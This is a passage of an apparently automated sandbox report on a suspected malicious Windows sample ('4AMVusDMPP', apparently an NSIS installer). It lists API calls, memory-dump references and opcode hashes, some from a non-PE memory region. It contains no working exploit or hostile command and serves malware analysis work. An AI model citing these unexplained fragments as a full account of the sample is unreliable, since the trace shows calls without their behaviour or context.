                                                          • GetDC.USER32(?), ref: 00401DBC
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                          • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                          • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E3E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                          • String ID:
                                                          • API String ID: 3808545654-0
                                                          • Opcode ID: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
                                                          • Instruction ID: 863f18fc6204ba506076eb1f746ada73c94881a68b515e1873f2d1072bd1cf43
                                                          • Opcode Fuzzy Hash: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
                                                          • Instruction Fuzzy Hash: 15017171944240EFE701ABB4AF8ABD97FB4AF55301F10457EE242F61E2CA7804459F2D
                                                          APIs
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6EAB21EC,?,00000808), ref: 6EAB1635
                                                          • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6EAB21EC,?,00000808), ref: 6EAB163C
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6EAB21EC,?,00000808), ref: 6EAB1650
                                                          • GetProcAddress.KERNEL32(6EAB21EC,00000000), ref: 6EAB1657
                                                          • GlobalFree.KERNEL32(00000000), ref: 6EAB1660
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1764566843.000000006EAB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EAB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1764543418.000000006EAB0000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000000.00000002.1764585429.000000006EAB4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000000.00000002.1764610050.000000006EAB6000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6eab0000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                          • String ID:
                                                          • API String ID: 1148316912-0
                                                          • Opcode ID: 7659cb2a5d8d579fb7173bef72d9288f2674ea7cb7cd6e58f2d6e74de03a9f34
                                                          • Instruction ID: 202ec9c9ad4114c126d5610fc77635b9c3e95038117c383782794de0bc039981
                                                          • Opcode Fuzzy Hash: 7659cb2a5d8d579fb7173bef72d9288f2674ea7cb7cd6e58f2d6e74de03a9f34
                                                          • Instruction Fuzzy Hash: 92F01C7260A6387BDA2016A68C4CC9BBE9CDF8B2F5B124211F628A21A0D6654C03D7F1
                                                          APIs
                                                          • GetDlgItem.USER32(?,?), ref: 00401D63
                                                          • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                          • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                          • String ID:
                                                          • API String ID: 1849352358-0
                                                          • Opcode ID: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
                                                          • Instruction ID: 8bbc6a183a468c813578a114873fb97f9d5ca0b11dae6a70aa3aa56fe52826a6
                                                          • Opcode Fuzzy Hash: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
                                                          • Instruction Fuzzy Hash: 4BF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D519B38
                                                          APIs
                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Timeout
                                                          • String ID: !
                                                          • API String ID: 1777923405-2657877971
                                                          • Opcode ID: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                          • Instruction ID: ef61c68cd4a6cc3a6f3726d4b558d534156d03c1c75d5f5b51cfe904c604fa23
                                                          • Opcode Fuzzy Hash: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                          • Instruction Fuzzy Hash: A621B471948209AEEF049FA5DA4AABD7BB4EB44304F14443EF605B61D0D7B845409B18
                                                          APIs
                                                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403492,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,774D3420,004036EF,?,00000006,00000008,0000000A), ref: 00405CC3
                                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403492,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,774D3420,004036EF,?,00000006,00000008,0000000A), ref: 00405CCD
                                                          • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405CDF
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CBD
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: CharPrevlstrcatlstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 2659869361-2145255484
                                                          • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                          • Instruction ID: 595fb0ef6d3bfc82903baa2f142a0de03b6946227050b98ce465681b6cfad29b
                                                          • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                          • Instruction Fuzzy Hash: AED0A771101630AAC111AB448D04CDF63ACEE45304342003BF601B70A2CB7C1D6287FD
                                                          APIs
                                                            • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                            • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,774D2EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,774D2EE0,00000000), ref: 00405D76
                                                            • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                            • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                          • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,?,?,774D2EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,774D2EE0,00000000), ref: 00405E1E
                                                          • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,?,?,774D2EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,774D2EE0), ref: 00405E2E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                          • String ID: 0_B
                                                          • API String ID: 3248276644-2128305573
                                                          • Opcode ID: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                          • Instruction ID: e2ef3bf648e1011fa726b67e088789f036b8871ba300d86fb9c867912b04298b
                                                          • Opcode Fuzzy Hash: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                          • Instruction Fuzzy Hash: B4F0F439109E5116D62233365D09BEF0548CF82354B5A853BFC91B22D2DB3C8A539DFE
                                                          APIs
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
                                                          • CloseHandle.KERNEL32(?), ref: 00405A07
                                                          Strings
                                                          • Error launching installer, xrefs: 004059E4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateHandleProcess
                                                          • String ID: Error launching installer
                                                          • API String ID: 3712363035-66219284
                                                          • Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                          • Instruction ID: 166b032e71181ba573d10d742cd21a74b10ba840f41c43b266edefbe5b435367
                                                          • Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                          • Instruction Fuzzy Hash: E5E04FB0A102097FEB009B64ED49F7B76ACFB04208F404531BD00F2150D774A8208A7C
                                                          APIs
                                                          • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,774D2EE0,00403A1A,774D3420,00403819,00000006,?,00000006,00000008,0000000A), ref: 00403A5D
                                                          • GlobalFree.KERNEL32(?), ref: 00403A64
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403A55
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Free$GlobalLibrary
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 1100898210-2145255484
                                                          • Opcode ID: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                          • Instruction ID: 7abb624b42f0eb5bf3103b67fd66c27476adae564a61ccebc81435f3e7eba37d
                                                          • Opcode Fuzzy Hash: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                          • Instruction Fuzzy Hash: 73E0EC326111205BC6229F59AD44B5E776D6F58B22F0A023AE8C07B26087745D938F98
                                                          APIs
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 6EAB116A
                                                          • GlobalFree.KERNEL32(00000000), ref: 6EAB11C7
                                                          • GlobalFree.KERNEL32(00000000), ref: 6EAB11D9
                                                          • GlobalFree.KERNEL32(?), ref: 6EAB1203
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1764566843.000000006EAB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EAB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1764543418.000000006EAB0000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000000.00000002.1764585429.000000006EAB4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000000.00000002.1764610050.000000006EAB6000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6eab0000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 1780285237-0
                                                          • Opcode ID: 4dd609deac0a3997217db941bfa419140d204792efc96997b1d9733504e4ff1d
                                                          • Instruction ID: ad741d80a4b64573d8638e0332e2e84a544554977c1e3b6fcf67891a60ba0fea
                                                          • Opcode Fuzzy Hash: 4dd609deac0a3997217db941bfa419140d204792efc96997b1d9733504e4ff1d
                                                          • Instruction Fuzzy Hash: 5E31B2B2900202DFDB008FE8E944A7677EDEF26310B15852DE844EB224E734DD8A8768
                                                          APIs
                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
                                                          • CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1731827175.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1731812818.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731842620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731859021.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1731930230.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                          • String ID:
                                                          • API String ID: 190613189-0
                                                          • Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                          • Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
                                                          • Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                          • Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114062801.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_160000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Xq$$q
                                                          • API String ID: 0-855381642
                                                          • Opcode ID: e7e14365cc7b1f19c89ae7e5d7d2656c95588372c045ce65f30947d03a837f25
                                                          • Instruction ID: f3a3c1bd251a8c5e7855ababd71b77c811b38624d0a73b487ce71d002cbbf781
                                                          • Opcode Fuzzy Hash: e7e14365cc7b1f19c89ae7e5d7d2656c95588372c045ce65f30947d03a837f25
                                                          • Instruction Fuzzy Hash: 1FF16D34E04348DFDB08DFB9D8546AEBBB2BF89300B148529E416A73A4DF359D12CB91
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114062801.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_160000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Xq$Xq$Xq$Xq
                                                          • API String ID: 0-3965792415
                                                          • Opcode ID: c4c4d8764dae8a5ffa1ebb1fcc3f3c955b2ea4109bb09461159c811314fcc75f
                                                          • Instruction ID: 70243d5c91d7d533545fb7c8f8ee030775eed91e635dcf77e8eefcdeea66ed0f
                                                          • Opcode Fuzzy Hash: c4c4d8764dae8a5ffa1ebb1fcc3f3c955b2ea4109bb09461159c811314fcc75f
                                                          • Instruction Fuzzy Hash: F3520B1961D3D2AFDB224B305CFB9D5BFA05E0314576D0ACEE0C1664A3DA9A87A9C313
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114062801.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_160000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4(\3L(\3$@*\3$LRq$d"\3
                                                          • API String ID: 0-2175920938
                                                          • Opcode ID: 52cb7a4b23194d4432d42256b597e560f9035b3114925e363228d08d46929420
                                                          • Instruction ID: 29a664f9bcf34dd86af36ed74f202cb9a4d689fcb2e344f3ff86ac31f527bd50
                                                          • Opcode Fuzzy Hash: 52cb7a4b23194d4432d42256b597e560f9035b3114925e363228d08d46929420
                                                          • Instruction Fuzzy Hash: C2A1D474E00609CFDF04DFA8D984A9DBBB2FF89701B108229E406AB365DB746D46CF95
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114062801.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_160000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Xq$Xq
                                                          • API String ID: 0-1556399337
                                                          • Opcode ID: 681aea3e95b62d3d04d0188476981f132b7d01995156ecf2f8075cbc4d4d6626
                                                          • Instruction ID: 23f73deddea2677413064a2d32d25dde92c53475610f00138fd2fd1b100b116d
                                                          • Opcode Fuzzy Hash: 681aea3e95b62d3d04d0188476981f132b7d01995156ecf2f8075cbc4d4d6626
                                                          • Instruction Fuzzy Hash: 3C414831B04B248BDF2D4BB58C943BEAAA6BFC5350F28403ED842C7691DBB48C949761
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114062801.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_160000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f613924426661e5566a5062310725d8a556241f6e085dca54f3e199d9a580df5
                                                          • Instruction ID: 8380eeb2ca07cc93cde33c37081fe99ce6d375eedb7e35726d2996e0d0f180c7
                                                          • Opcode Fuzzy Hash: f613924426661e5566a5062310725d8a556241f6e085dca54f3e199d9a580df5
                                                          • Instruction Fuzzy Hash: 57210531D0020AAFCB15DF78C8505EE7B74FF96360F158267E914AB244EB30AA59CB91
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114062801.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_160000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6f72116d8728237f90dd2d1c2a1154c992159daf8046983e9fd8ad143f56d08f
                                                          • Instruction ID: 39884a803cc13f794faab1e66f3f27301d94edd9537ce6e3992cf1a5ff384c81
                                                          • Opcode Fuzzy Hash: 6f72116d8728237f90dd2d1c2a1154c992159daf8046983e9fd8ad143f56d08f
                                                          • Instruction Fuzzy Hash: 6821C131E00205AFCB14DB68C8509BE3BA5FF98360B14C129E9199B250DB30EE0ACBC1
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114062801.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_160000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1ed9c195bf720ef1948e4a7f391aa7991bcaf81a045fdfc03fe11e47d64a44e8
                                                          • Instruction ID: 7c314dc53c4ebfb874a83be1ea12717ac77b2e1ff5bdff283f8dd77a4441bda4
                                                          • Opcode Fuzzy Hash: 1ed9c195bf720ef1948e4a7f391aa7991bcaf81a045fdfc03fe11e47d64a44e8
                                                          • Instruction Fuzzy Hash: BB317F78E01308DFCB48DFA8D59499DBBB2FF49701B614069E81AAB364DB35AD41CF41
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114062801.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_160000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 892cf4be8f46f812074154bbca1dbbb8aa410f4d753782614731db90cace5a62
                                                          • Instruction ID: c56ed69e02fb7d37ce5c569233d23fe97cd4a7576ae3effcdd11969cde695a69
                                                          • Opcode Fuzzy Hash: 892cf4be8f46f812074154bbca1dbbb8aa410f4d753782614731db90cace5a62
                                                          • Instruction Fuzzy Hash: B72120B0C052098FCB01DFA8D8446EEBFF4FF4A300F0441AAD405B7261EB345A95CBA5
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114062801.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_160000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3fc58a559d81275ab2efb3bd2b10ddc22ce72bbaf82d08263964785833d663a7
                                                          • Instruction ID: 5173bff55ec8661dcf84086ce029f384702e65dc4f64c9eecc6a0c168bdb71ed
                                                          • Opcode Fuzzy Hash: 3fc58a559d81275ab2efb3bd2b10ddc22ce72bbaf82d08263964785833d663a7
                                                          • Instruction Fuzzy Hash: 76D01231D2032A978B10A6A5DC044EEBB38EE95221B504626D51437144EB70665986A1
                                                          APIs
                                                          • SetErrorMode.KERNEL32 ref: 004034C8
                                                          • GetVersion.KERNEL32 ref: 004034CE
                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
                                                          • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040353E
                                                          • OleInitialize.OLE32(00000000), ref: 00403545
                                                          • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403561
                                                          • GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 00403576
                                                          • CharNextW.USER32(00000000,00435000,00000020,00435000,00000000,?,00000006,00000008,0000000A), ref: 004035AE
                                                            • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                            • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                          • GetTempPathW.KERNEL32(00000400,00437800,?,00000006,00000008,0000000A), ref: 004036E8
                                                          • GetWindowsDirectoryW.KERNEL32(00437800,000003FB,?,00000006,00000008,0000000A), ref: 004036F9
                                                          • lstrcatW.KERNEL32(00437800,\Temp,?,00000006,00000008,0000000A), ref: 00403705
                                                          • GetTempPathW.KERNEL32(000003FC,00437800,00437800,\Temp,?,00000006,00000008,0000000A), ref: 00403719
                                                          • lstrcatW.KERNEL32(00437800,Low,?,00000006,00000008,0000000A), ref: 00403721
                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,00437800,00437800,Low,?,00000006,00000008,0000000A), ref: 00403732
                                                          • SetEnvironmentVariableW.KERNEL32(TMP,00437800,?,00000006,00000008,0000000A), ref: 0040373A
                                                          • DeleteFileW.KERNEL32(00437000,?,00000006,00000008,0000000A), ref: 0040374E
                                                            • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
